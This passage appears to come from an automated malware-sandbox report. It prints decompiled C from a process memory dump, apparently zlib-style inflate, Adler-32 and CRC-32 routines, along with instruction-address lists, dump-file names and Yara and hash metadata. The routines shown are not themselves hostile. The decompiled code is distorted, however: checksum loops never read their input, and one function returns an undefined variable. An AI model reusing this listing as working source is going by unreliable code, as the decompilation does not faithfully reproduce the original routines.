					if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t698 <  *(_t557 + 0x14)) {
						_t558 =  *(_t557 + 0x14) - _t698;
						 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t698,  *(_t557 + 8) + _t698);
					}
					if(_v28 == 0) {
						_t558 = 0;
						 *((intOrPtr*)(_t557 + 0x20)) = 0;
						 *((intOrPtr*)(_t557 + 4)) = 0x5b;
					}
					goto L94;
				}
				if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x10)) == 0) {
					 *((intOrPtr*)(_t557 + 4)) = 0x49;
					goto L78;
				}
				_t699 =  *(_t557 + 0x14);
				while(( *( *(_t557 + 0x1c) + 0x14) & 0x0000ffff) >  *((intOrPtr*)(_t557 + 0x20))) {
					if( *(_t557 + 0x14) !=  *((intOrPtr*)(_t557 + 0xc))) {
						L70:
						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
						_t558 =  *(_t557 + 8);
						 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)( *(_t557 + 0x1c) + 0x10)) +  *((intOrPtr*)(_t557 + 0x20))));
						 *((intOrPtr*)(_t557 + 0x20)) =  *((intOrPtr*)(_t557 + 0x20)) + 1;
						continue;
					}
					if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t699 <  *(_t557 + 0x14)) {
						_t558 =  *(_t557 + 0x14) - _t699;
						 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t699,  *(_t557 + 8) + _t699);
					}
					E2402FCF0(_t695, _t558);
					_t492 =  *(_t557 + 0x14);
					_t699 = _t492;
					if(_t492 ==  *((intOrPtr*)(_t557 + 0xc))) {
						break;
					} else {
						goto L70;
					}
				}
				_t558 =  *(_t557 + 0x1c);
				if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t699 <  *(_t557 + 0x14)) {
					_t558 =  *(_t557 + 0x14) - _t699;
					 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t699,  *(_t557 + 8) + _t699);
				}
				if( *( *(_t557 + 0x1c) + 0x14) ==  *((intOrPtr*)(_t557 + 0x20))) {
					_t558 = 0;
					 *((intOrPtr*)(_t557 + 0x20)) = 0;
					 *((intOrPtr*)(_t557 + 4)) = 0x49;
				}
				goto L78;
			}









































                                    0x2402fd4b
                                    0x2402fd4d
                                    0x2402fd51
                                    0x00000000
                                    0x2402fd62
                                    0x2402fd70
                                    0x2402fd73
                                    0x2402fd8e
                                    0x2402fd93
                                    0x00000000
                                    0x2402fd96
                                    0x2402fda4
                                    0x2402fda6
                                    0x2402fdb1
                                    0x00000000
                                    0x2402fdb1
                                    0x2402fdb9
                                    0x2402fdbe
                                    0x2402fdc1
                                    0x2402fdc8
                                    0x2402fdd2
                                    0x2403000b
                                    0x24030015
                                    0x24030020
                                    0x24030024
                                    0x24030024
                                    0x2403002d
                                    0x24030039
                                    0x24030042
                                    0x2403003b
                                    0x2403003b
                                    0x2403003b
                                    0x2403002f
                                    0x2403002f
                                    0x2403002f
                                    0x2403002d
                                    0x2403004a
                                    0x24030050
                                    0x24030052
                                    0x24030052
                                    0x2403006b
                                    0x24030074
                                    0x2403007d
                                    0x24030087
                                    0x24030097
                                    0x24030097
                                    0x2403009c
                                    0x240300a7
                                    0x2402fdd8
                                    0x2402fde3
                                    0x2402fde9
                                    0x2402fdef
                                    0x2402fdf6
                                    0x2402fdfc
                                    0x2402fe03
                                    0x2402fe09
                                    0x2402fe11
                                    0x2402fea8
                                    0x2402feae
                                    0x2402feaa
                                    0x2402feaa
                                    0x2402feaa
                                    0x2402feb7
                                    0x2402febd
                                    0x2402feb9
                                    0x2402feb9
                                    0x2402feb9
                                    0x2402febf
                                    0x2402fec8
                                    0x2402fece
                                    0x2402feca
                                    0x2402feca
                                    0x2402feca
                                    0x2402fed0
                                    0x2402fed9
                                    0x2402fedf
                                    0x2402fedb
                                    0x2402fedb
                                    0x2402fedb
                                    0x2402fee1
                                    0x2402feea
                                    0x2402fef0
                                    0x2402feec
                                    0x2402feec
                                    0x2402feec
                                    0x2402fef7
                                    0x2402fefd
                                    0x2402ff03
                                    0x2402ff11
                                    0x2402ff17
                                    0x2402ff28
                                    0x2402ff2e
                                    0x2402ff3f
                                    0x2402ff45
                                    0x2402ff56
                                    0x2402ff59
                                    0x2402ff5c
                                    0x2402ff66
                                    0x2402ff69
                                    0x2402ff76
                                    0x2402ff81
                                    0x2402ff85
                                    0x2402ff85
                                    0x2402ff85
                                    0x2402ff6b
                                    0x2402ff6b
                                    0x2402ff6b
                                    0x2402ff87
                                    0x2402ff8d
                                    0x2402ff90
                                    0x2402ff9b
                                    0x2402ff9e
                                    0x2402ffa5
                                    0x2402ffaa
                                    0x2402ffb4
                                    0x2402ffba
                                    0x2402ffbf
                                    0x2402ffce
                                    0x2402ffd1
                                    0x2402ffd1
                                    0x2402ffdb
                                    0x2402ffdd
                                    0x2402ffeb
                                    0x2402ffeb
                                    0x2402fff0
                                    0x2402fff3
                                    0x2402fe17
                                    0x2402fe1a
                                    0x2402fe20
                                    0x2402fe27
                                    0x2402fe2d
                                    0x2402fe34
                                    0x2402fe3a
                                    0x2402fe41
                                    0x2402fe47
                                    0x2402fe4e
                                    0x2402fe54
                                    0x2402fe58
                                    0x2402fe5b
                                    0x2402fe65
                                    0x2402fe68
                                    0x2402fe75
                                    0x2402fe80
                                    0x2402fe84
                                    0x2402fe84
                                    0x2402fe84
                                    0x2402fe6a
                                    0x2402fe6a
                                    0x2402fe6a
                                    0x2402fe86
                                    0x2402fe8c
                                    0x2402fe92
                                    0x2402fe96
                                    0x2402fe96
                                    0x2402fe11
                                    0x2402fdd2
                                    0x240300ae
                                    0x24030171
                                    0x24030175
                                    0x2403023b
                                    0x2403023f
                                    0x24030300
                                    0x24030304
                                    0x24030306
                                    0x2403030d
                                    0x2403036a
                                    0x2403030f
                                    0x24030318
                                    0x2403031c
                                    0x2403031c
                                    0x2403032a
                                    0x2403032f
                                    0x2403033b
                                    0x24030341
                                    0x24030350
                                    0x24030353
                                    0x2403035e
                                    0x24030361
                                    0x24030361
                                    0x2403032a
                                    0x2403030d
                                    0x24030375
                                    0x24030398
                                    0x00000000
                                    0x240303a4
                                    0x240303a4
                                    0x240303af
                                    0x00000000
                                    0x240303af
                                    0x24030377
                                    0x24030379
                                    0x24030382
                                    0x240303b7
                                    0x240303be
                                    0x240303dd
                                    0x24030410
                                    0x24030419
                                    0x24030422
                                    0x24030422
                                    0x2403042e
                                    0x2403043b
                                    0x2403043d
                                    0x2403043d
                                    0x00000000
                                    0x2403044b
                                    0x24030450
                                    0x00000000
                                    0x00000000
                                    0x24030455
                                    0x24030462
                                    0x24030468
                                    0x24030470
                                    0x24030475
                                    0x24030478
                                    0x2403048c
                                    0x24030491
                                    0x24030457
                                    0x24030459
                                    0x24030459
                                    0x24030496
                                    0x2403049f
                                    0x00000000
                                    0x240304a1
                                    0x240304a1
                                    0x00000000
                                    0x240304a8
                                    0x2403049f
                                    0x240304af
                                    0x240304af
                                    0x240304b2
                                    0x240304bb
                                    0x240304c0
                                    0x240304cf
                                    0x24030579
                                    0x24030589
                                    0x240304d5
                                    0x240304d8
                                    0x240304e3
                                    0x240304e9
                                    0x240304f7
                                    0x240304fd
                                    0x2403050b
                                    0x24030511
                                    0x2403051f
                                    0x24030525
                                    0x24030530
                                    0x24030536
                                    0x24030544
                                    0x2403054a
                                    0x24030558
                                    0x2403055e
                                    0x24030561
                                    0x2403056c
                                    0x2403056c
                                    0x24030590
                                    0x24030595
                                    0x2403059a
                                    0x2403059e
                                    0x2403059e
                                    0x240305a5
                                    0x00000000
                                    0x240305a7
                                    0x00000000
                                    0x240305a7
                                    0x240305a5
                                    0x00000000
                                    0x240304c2
                                    0x00000000
                                    0x240304b4
                                    0x240303c6
                                    0x240303c6
                                    0x240303d1
                                    0x00000000
                                    0x240303d1
                                    0x240303be
                                    0x24030384
                                    0x00000000
                                    0x2403038b
                                    0x24030375
                                    0x2403024c
                                    0x240302f9
                                    0x00000000
                                    0x240302f9
                                    0x24030252
                                    0x24030255
                                    0x2403025b
                                    0x00000000
                                    0x00000000
                                    0x24030264
                                    0x24030271
                                    0x2403027d
                                    0x2403027d
                                    0x24030282
                                    0x24030287
                                    0x2403028a
                                    0x2403028f
                                    0x24030291
                                    0x00000000
                                    0x24030291
                                    0x2403029b
                                    0x2403029e
                                    0x240302ab
                                    0x240302b2
                                    0x240302b5
                                    0x240302bc
                                    0x240302bf
                                    0x240302cd
                                    0x240302da
                                    0x240302e6
                                    0x240302e6
                                    0x240302ee
                                    0x240302f0
                                    0x240302f0
                                    0x00000000
                                    0x240302ee
                                    0x24030182
                                    0x24030234
                                    0x00000000
                                    0x24030234
                                    0x24030188
                                    0x2403018b
                                    0x24030191
                                    0x00000000
                                    0x00000000
                                    0x2403019a
                                    0x240301a7
                                    0x240301b3
                                    0x240301b3
                                    0x240301b8
                                    0x240301bd
                                    0x240301c0
                                    0x240301c5
                                    0x240301c7
                                    0x00000000
                                    0x240301c7
                                    0x240301d1
                                    0x240301d4
                                    0x240301e1
                                    0x240301e8
                                    0x240301eb
                                    0x240301f2
                                    0x240301f5
                                    0x24030203
                                    0x24030210
                                    0x2403021c
                                    0x2403021c
                                    0x24030224
                                    0x24030226
                                    0x24030228
                                    0x2403022b
                                    0x2403022b
                                    0x00000000
                                    0x24030224
                                    0x240300bb
                                    0x2403016a
                                    0x00000000
                                    0x2403016a
                                    0x240300c1
                                    0x2403011d
                                    0x240300cc
                                    0x24030102
                                    0x24030111
                                    0x24030114
                                    0x24030117
                                    0x2403011a
                                    0x00000000
                                    0x2403011a
                                    0x240300d5
                                    0x240300e2
                                    0x240300ee
                                    0x240300ee
                                    0x240300f3
                                    0x240300f8
                                    0x240300fb
                                    0x24030100
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24030100
                                    0x2403012e
                                    0x24030135
                                    0x24030142
                                    0x2403014e
                                    0x2403014e
                                    0x2403015a
                                    0x2403015c
                                    0x2403015e
                                    0x24030161
                                    0x24030161
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1324569676030001962594cb11772bef0d4ac0f70d6c902ff0776469fb6b5cc9
                                    • Instruction ID: ca329548274935c41ef3cc54b97bc8c95bf02a460d190cdab6f0932d49d0e833
                                    • Opcode Fuzzy Hash: 1324569676030001962594cb11772bef0d4ac0f70d6c902ff0776469fb6b5cc9
                                    • Instruction Fuzzy Hash: B3520074605600CFDB5ACF28C5C0A577FE2AB85314F1486A9DC568F28BC734E996CFA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402F414, Relevance: .2, Instructions: 238COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2402F414(signed int __eax, void* __ecx, void* __edx) {
				void* _t69;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				void* _t119;
				void* _t150;
				signed int _t195;
				signed int _t227;
				void* _t229;

				_t229 = __ecx;
				_t195 = __eax >> 0x00000010 & 0x0000ffff;
				_t86 = __eax & 0x0000ffff;
				_t228 = __edx;
				if(__ecx != 1) {
					if(__edx != 0) {
						if(__ecx >= 0x10) {
							if(__ecx < 0x15b0) {
								L19:
								if(_t229 == 0) {
									L26:
									return _t195 << 0x00000010 | _t86;
								}
								if(_t229 < 0x10) {
									while(1) {
										L24:
										_t119 = _t229;
										_t229 = _t229 + 0xffffffff;
										if(_t119 == 0) {
											break;
										}
										_t86 = _t86;
										_t228 = _t228 + 1;
										_t195 = _t195 + _t86;
									}
									_t86 = _t86 % 0xfff1;
									_t195 = _t195 % 0xfff1;
									goto L26;
								} else {
									goto L21;
								}
								do {
									L21:
									_t229 = _t229 - 0x10;
									_t87 = _t86;
									_t88 = _t87;
									_t89 = _t88;
									_t90 = _t89;
									_t91 = _t90;
									_t92 = _t91;
									_t93 = _t92;
									_t94 = _t93;
									_t95 = _t94;
									_t96 = _t95;
									_t97 = _t96;
									_t98 = _t97;
									_t99 = _t98;
									_t100 = _t99;
									_t101 = _t100;
									_t86 = _t101;
									_t195 = _t195 + _t87 + _t88 + _t89 + _t90 + _t91 + _t92 + _t93 + _t94 + _t95 + _t96 + _t97 + _t98 + _t99 + _t100 + _t101 + _t86;
									_t228 = _t228 + 0x10;
								} while (_t229 >= 0x10);
								goto L24;
							} else {
								goto L16;
							}
							do {
								L16:
								_t229 = _t229 - 0x15b0;
								_t69 = 0x15b;
								do {
									_t102 = _t86;
									_t103 = _t102;
									_t104 = _t103;
									_t105 = _t104;
									_t106 = _t105;
									_t107 = _t106;
									_t108 = _t107;
									_t109 = _t108;
									_t110 = _t109;
									_t111 = _t110;
									_t112 = _t111;
									_t113 = _t112;
									_t114 = _t113;
									_t115 = _t114;
									_t116 = _t115;
									_t86 = _t116;
									_t195 = _t195 + _t102 + _t103 + _t104 + _t105 + _t106 + _t107 + _t108 + _t109 + _t110 + _t111 + _t112 + _t113 + _t114 + _t115 + _t116 + _t86;
									_t228 = _t228 + 0x10;
									_t69 = _t69 - 1;
								} while (_t69 != 0);
								_t86 = _t86 % 0xfff1;
								_t195 = _t195 % 0xfff1;
							} while (_t229 >= 0x15b0);
							goto L19;
						}
						while(1) {
							_t150 = _t229;
							_t229 = _t229 + 0xffffffff;
							if(_t150 == 0) {
								break;
							}
							_t86 = _t86;
							_t228 = _t228 + 1;
							_t195 = _t195 + _t86;
						}
						if(_t86 >= 0xfff1) {
							_t86 = _t86 - 0xfff1;
						}
						return _t195 % 0x0000fff1 << 0x00000010 | _t86;
					}
					return 1;
				}
				_t117 = _t86;
				if(_t117 >= 0xfff1) {
					_t117 = _t117 - 0xfff1;
				}
				_t227 = _t195 + _t117;
				if(_t227 >= 0xfff1) {
					_t227 = _t227 - 0xfff1;
				}
				return _t227 << 0x00000010 | _t117;
			}









































                                    0x2402f41f
                                    0x2402f421
                                    0x2402f427
                                    0x2402f430
                                    0x2402f432
                                    0x2402f466
                                    0x2402f475
                                    0x2402f4b8
                                    0x2402f588
                                    0x2402f58a
                                    0x2402f665
                                    0x00000000
                                    0x2402f66a
                                    0x2402f593
                                    0x2402f642
                                    0x2402f642
                                    0x2402f642
                                    0x2402f644
                                    0x2402f649
                                    0x00000000
                                    0x00000000
                                    0x2402f63d
                                    0x2402f63f
                                    0x2402f640
                                    0x2402f640
                                    0x2402f656
                                    0x2402f663
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2402f599
                                    0x2402f599
                                    0x2402f599
                                    0x2402f5a0
                                    0x2402f5a9
                                    0x2402f5b2
                                    0x2402f5bb
                                    0x2402f5c4
                                    0x2402f5cd
                                    0x2402f5d6
                                    0x2402f5df
                                    0x2402f5e8
                                    0x2402f5f1
                                    0x2402f5fa
                                    0x2402f603
                                    0x2402f60c
                                    0x2402f615
                                    0x2402f61e
                                    0x2402f627
                                    0x2402f629
                                    0x2402f62b
                                    0x2402f62e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2402f4be
                                    0x2402f4be
                                    0x2402f4be
                                    0x2402f4c4
                                    0x2402f4c9
                                    0x2402f4cd
                                    0x2402f4d6
                                    0x2402f4df
                                    0x2402f4e8
                                    0x2402f4f1
                                    0x2402f4fa
                                    0x2402f503
                                    0x2402f50c
                                    0x2402f515
                                    0x2402f51e
                                    0x2402f527
                                    0x2402f530
                                    0x2402f539
                                    0x2402f542
                                    0x2402f54b
                                    0x2402f554
                                    0x2402f556
                                    0x2402f558
                                    0x2402f55b
                                    0x2402f55b
                                    0x2402f56d
                                    0x2402f57a
                                    0x2402f57c
                                    0x00000000
                                    0x2402f4be
                                    0x2402f482
                                    0x2402f482
                                    0x2402f484
                                    0x2402f489
                                    0x00000000
                                    0x00000000
                                    0x2402f47d
                                    0x2402f47f
                                    0x2402f480
                                    0x2402f480
                                    0x2402f491
                                    0x2402f493
                                    0x2402f493
                                    0x00000000
                                    0x2402f4ab
                                    0x00000000
                                    0x2402f468
                                    0x2402f438
                                    0x2402f440
                                    0x2402f442
                                    0x2402f442
                                    0x2402f448
                                    0x2402f450
                                    0x2402f452
                                    0x2402f452
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a46a25728c0e4dbe5aa0a1433bd48846487817f0c63754d6310f19dcd07371b1
                                    • Instruction ID: 914b18599cbe833f8515df6703e9411321722583a853c81507b953dfd69011a6
                                    • Opcode Fuzzy Hash: a46a25728c0e4dbe5aa0a1433bd48846487817f0c63754d6310f19dcd07371b1
                                    • Instruction Fuzzy Hash: 3761652238DB8103E33DCE7D5CE02B7DAD35FC521862ED97D94DAC3F82E899A5565104
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24035C24, Relevance: .2, Instructions: 222COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24035C24(signed int __eax, void* __ecx, signed char __edx) {
				signed int _t121;
				unsigned int _t127;
				signed int _t128;
				unsigned int _t129;
				signed int _t130;
				unsigned int _t132;
				signed int _t133;
				unsigned int _t135;
				signed int _t136;
				unsigned int _t138;
				signed int _t139;
				unsigned int _t141;
				signed int _t142;
				unsigned int _t144;
				signed int _t145;
				unsigned int _t147;
				signed int _t148;
				unsigned int _t150;
				signed int _t151;
				void* _t154;
				signed char _t161;
				signed int* _t162;
				signed char* _t163;
				signed int* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int* _t172;
				signed int* _t173;
				signed int* _t174;
				signed int* _t175;
				signed int _t185;
				signed int _t188;
				signed int _t191;
				signed int _t194;
				signed int _t197;
				signed int _t200;
				signed int _t203;
				signed int _t206;
				signed int _t209;
				signed int _t212;
				signed int _t215;
				signed int _t218;
				signed int _t221;
				signed int _t224;
				signed int _t227;
				signed int _t230;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				signed int _t249;
				signed int _t255;
				signed int _t261;
				signed int _t267;
				signed int _t273;
				signed int _t279;
				signed int _t285;
				signed int _t291;
				signed int _t297;

				_t161 = __edx;
				_t154 = __ecx;
				_t121 =  !((__eax >> 0x18) + (__eax >> 0x00000008 & 0x0000ff00) + ((__eax & 0x0000ff00) << 8) + ((__eax & 0x000000ff) << 0x18));
				while(_t154 != 0 && (_t161 & 0x00000003) != 0) {
					_t237 =  *_t161 & 0x000000ff;
					_t161 = _t161 + 1;
					_t2 = (_t121 >> 0x00000018 ^ _t237) * 4; // 0x0
					_t154 = _t154 - 1;
					_t121 =  *(0x24058a24 + _t2 + 0x1000) ^ _t121 << 0x00000008;
				}
				_t162 = _t161 - 4;
				while(_t154 >= 0x20) {
					_t169 =  &(_t162[1]);
					_t129 = _t121 ^  *_t169;
					_t170 =  &(_t169[1]);
					_t255 = _t129 & 0x000000ff;
					_t191 = _t129 >> 0x00000008 & 0x000000ff;
					_t7 = _t255 * 4; // 0x0
					_t10 = _t191 * 4; // 0x0
					_t194 = _t129 >> 0x00000010 & 0x000000ff;
					_t130 = _t129 >> 0x18;
					_t13 = _t194 * 4; // 0x0
					_t16 = _t130 * 4; // 0x0
					_t132 =  *(0x24058a24 + _t7 + 0x1000) ^  *(0x24058a24 + _t10 + 0x1400) ^  *(0x24058a24 + _t13 + 0x1800) ^  *(0x24058a24 + _t16 + 0x1c00) ^  *_t170;
					_t171 =  &(_t170[1]);
					_t261 = _t132 & 0x000000ff;
					_t197 = _t132 >> 0x00000008 & 0x000000ff;
					_t19 = _t261 * 4; // 0x0
					_t22 = _t197 * 4; // 0x0
					_t200 = _t132 >> 0x00000010 & 0x000000ff;
					_t133 = _t132 >> 0x18;
					_t25 = _t200 * 4; // 0x0
					_t28 = _t133 * 4; // 0x0
					_t135 =  *(0x24058a24 + _t19 + 0x1000) ^  *(0x24058a24 + _t22 + 0x1400) ^  *(0x24058a24 + _t25 + 0x1800) ^  *(0x24058a24 + _t28 + 0x1c00) ^  *_t171;
					_t172 =  &(_t171[1]);
					_t267 = _t135 & 0x000000ff;
					_t203 = _t135 >> 0x00000008 & 0x000000ff;
					_t31 = _t267 * 4; // 0x0
					_t34 = _t203 * 4; // 0x0
					_t206 = _t135 >> 0x00000010 & 0x000000ff;
					_t136 = _t135 >> 0x18;
					_t37 = _t206 * 4; // 0x0
					_t40 = _t136 * 4; // 0x0
					_t138 =  *(0x24058a24 + _t31 + 0x1000) ^  *(0x24058a24 + _t34 + 0x1400) ^  *(0x24058a24 + _t37 + 0x1800) ^  *(0x24058a24 + _t40 + 0x1c00) ^  *_t172;
					_t173 =  &(_t172[1]);
					_t273 = _t138 & 0x000000ff;
					_t209 = _t138 >> 0x00000008 & 0x000000ff;
					_t43 = _t273 * 4; // 0x0
					_t46 = _t209 * 4; // 0x0
					_t212 = _t138 >> 0x00000010 & 0x000000ff;
					_t139 = _t138 >> 0x18;
					_t49 = _t212 * 4; // 0x0
					_t52 = _t139 * 4; // 0x0
					_t141 =  *(0x24058a24 + _t43 + 0x1000) ^  *(0x24058a24 + _t46 + 0x1400) ^  *(0x24058a24 + _t49 + 0x1800) ^  *(0x24058a24 + _t52 + 0x1c00) ^  *_t173;
					_t174 =  &(_t173[1]);
					_t279 = _t141 & 0x000000ff;
					_t215 = _t141 >> 0x00000008 & 0x000000ff;
					_t55 = _t279 * 4; // 0x0
					_t58 = _t215 * 4; // 0x0
					_t218 = _t141 >> 0x00000010 & 0x000000ff;
					_t142 = _t141 >> 0x18;
					_t61 = _t218 * 4; // 0x0
					_t64 = _t142 * 4; // 0x0
					_t144 =  *(0x24058a24 + _t55 + 0x1000) ^  *(0x24058a24 + _t58 + 0x1400) ^  *(0x24058a24 + _t61 + 0x1800) ^  *(0x24058a24 + _t64 + 0x1c00) ^  *_t174;
					_t175 =  &(_t174[1]);
					_t285 = _t144 & 0x000000ff;
					_t221 = _t144 >> 0x00000008 & 0x000000ff;
					_t67 = _t285 * 4; // 0x0
					_t70 = _t221 * 4; // 0x0
					_t224 = _t144 >> 0x00000010 & 0x000000ff;
					_t145 = _t144 >> 0x18;
					_t73 = _t224 * 4; // 0x0
					_t76 = _t145 * 4; // 0x0
					_t147 =  *(0x24058a24 + _t67 + 0x1000) ^  *(0x24058a24 + _t70 + 0x1400) ^  *(0x24058a24 + _t73 + 0x1800) ^  *(0x24058a24 + _t76 + 0x1c00) ^  *_t175;
					_t162 =  &(_t175[1]);
					_t291 = _t147 & 0x000000ff;
					_t227 = _t147 >> 0x00000008 & 0x000000ff;
					_t79 = _t291 * 4; // 0x0
					_t82 = _t227 * 4; // 0x0
					_t230 = _t147 >> 0x00000010 & 0x000000ff;
					_t148 = _t147 >> 0x18;
					_t85 = _t230 * 4; // 0x0
					_t88 = _t148 * 4; // 0x0
					_t150 =  *(0x24058a24 + _t79 + 0x1000) ^  *(0x24058a24 + _t82 + 0x1400) ^  *(0x24058a24 + _t85 + 0x1800) ^  *(0x24058a24 + _t88 + 0x1c00) ^  *_t162;
					_t297 = _t150 & 0x000000ff;
					_t233 = _t150 >> 0x00000008 & 0x000000ff;
					_t91 = _t297 * 4; // 0x0
					_t94 = _t233 * 4; // 0x0
					_t236 = _t150 >> 0x00000010 & 0x000000ff;
					_t151 = _t150 >> 0x18;
					_t97 = _t236 * 4; // 0x0
					_t100 = _t151 * 4; // 0x0
					_t154 = _t154 - 0x20;
					_t121 =  *(0x24058a24 + _t91 + 0x1000) ^  *(0x24058a24 + _t94 + 0x1400) ^  *(0x24058a24 + _t97 + 0x1800) ^  *(0x24058a24 + _t100 + 0x1c00);
				}
				while(_t154 >= 4) {
					_t162 =  &(_t162[1]);
					_t127 = _t121 ^  *_t162;
					_t249 = _t127 & 0x000000ff;
					_t185 = _t127 >> 0x00000008 & 0x000000ff;
					_t103 = _t249 * 4; // 0x0
					_t106 = _t185 * 4; // 0x0
					_t188 = _t127 >> 0x00000010 & 0x000000ff;
					_t128 = _t127 >> 0x18;
					_t109 = _t188 * 4; // 0x0
					_t112 = _t128 * 4; // 0x0
					_t154 = _t154 - 4;
					_t121 =  *(0x24058a24 + _t103 + 0x1000) ^  *(0x24058a24 + _t106 + 0x1400) ^  *(0x24058a24 + _t109 + 0x1800) ^  *(0x24058a24 + _t112 + 0x1c00);
				}
				_t163 =  &(_t162[1]);
				if(_t154 != 0) {
					do {
						_t115 = (_t121 >> 0x00000018 ^  *_t163 & 0x000000ff) * 4; // 0x0
						_t163 =  &(_t163[1]);
						_t121 =  *(0x24058a24 + _t115 + 0x1000) ^ _t121 << 0x00000008;
						_t154 = _t154 - 1;
					} while (_t154 != 0);
				}
				return ( !_t121 >> 0x18) + ( !_t121 >> 0x00000008 & 0x0000ff00) + (( !_t121 & 0x0000ff00) << 8) + ((_t122 & 0x000000ff) << 0x18);
			}





























































                                    0x24035c24
                                    0x24035c24
                                    0x24035c57
                                    0x24035c75
                                    0x24035c5b
                                    0x24035c60
                                    0x24035c69
                                    0x24035c72
                                    0x24035c73
                                    0x24035c73
                                    0x24035c7e
                                    0x24035c84
                                    0x24035c8a
                                    0x24035c8d
                                    0x24035c8f
                                    0x24035c99
                                    0x24035c9f
                                    0x24035ca5
                                    0x24035cac
                                    0x24035cb8
                                    0x24035cbe
                                    0x24035cc1
                                    0x24035cc8
                                    0x24035cd1
                                    0x24035cd3
                                    0x24035cdd
                                    0x24035ce3
                                    0x24035ce9
                                    0x24035cf0
                                    0x24035cfc
                                    0x24035d02
                                    0x24035d05
                                    0x24035d0c
                                    0x24035d15
                                    0x24035d17
                                    0x24035d21
                                    0x24035d27
                                    0x24035d2d
                                    0x24035d34
                                    0x24035d40
                                    0x24035d46
                                    0x24035d49
                                    0x24035d50
                                    0x24035d59
                                    0x24035d5b
                                    0x24035d65
                                    0x24035d6b
                                    0x24035d71
                                    0x24035d78
                                    0x24035d84
                                    0x24035d8a
                                    0x24035d8d
                                    0x24035d94
                                    0x24035d9d
                                    0x24035d9f
                                    0x24035da9
                                    0x24035daf
                                    0x24035db5
                                    0x24035dbc
                                    0x24035dc8
                                    0x24035dce
                                    0x24035dd1
                                    0x24035dd8
                                    0x24035de1
                                    0x24035de3
                                    0x24035ded
                                    0x24035df3
                                    0x24035df9
                                    0x24035e00
                                    0x24035e0c
                                    0x24035e12
                                    0x24035e15
                                    0x24035e1c
                                    0x24035e25
                                    0x24035e27
                                    0x24035e31
                                    0x24035e37
                                    0x24035e3d
                                    0x24035e44
                                    0x24035e50
                                    0x24035e56
                                    0x24035e59
                                    0x24035e60
                                    0x24035e69
                                    0x24035e72
                                    0x24035e78
                                    0x24035e7e
                                    0x24035e85
                                    0x24035e91
                                    0x24035e97
                                    0x24035e9a
                                    0x24035ea1
                                    0x24035ea8
                                    0x24035eab
                                    0x24035ead
                                    0x24035eb9
                                    0x24035ebb
                                    0x24035ebe
                                    0x24035ec7
                                    0x24035ecd
                                    0x24035ed3
                                    0x24035eda
                                    0x24035ee6
                                    0x24035eec
                                    0x24035eef
                                    0x24035ef6
                                    0x24035efd
                                    0x24035f00
                                    0x24035f02
                                    0x24035f07
                                    0x24035f0c
                                    0x24035f0e
                                    0x24035f1b
                                    0x24035f24
                                    0x24035f25
                                    0x24035f27
                                    0x24035f27
                                    0x24035f0e
                                    0x24035f5a

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ce360011dbc80d7d50c67357545da675b3ccca93646a54bcbfa7484c31cd74b6
                                    • Instruction ID: 756408b15116d4ba90c528348a3d483700a371b5a497628bb5f80aaf169001e1
                                    • Opcode Fuzzy Hash: ce360011dbc80d7d50c67357545da675b3ccca93646a54bcbfa7484c31cd74b6
                                    • Instruction Fuzzy Hash: 31816C73D214374BEB628EA88C443A17392AFCC39EF5B46B0ED05BB64AD534BD5186C0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24035970, Relevance: .2, Instructions: 190COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24035970(signed int __eax, void* __ecx, signed char __edx) {
				signed int _t107;
				unsigned int _t110;
				unsigned int _t112;
				unsigned int _t115;
				unsigned int _t118;
				unsigned int _t121;
				unsigned int _t124;
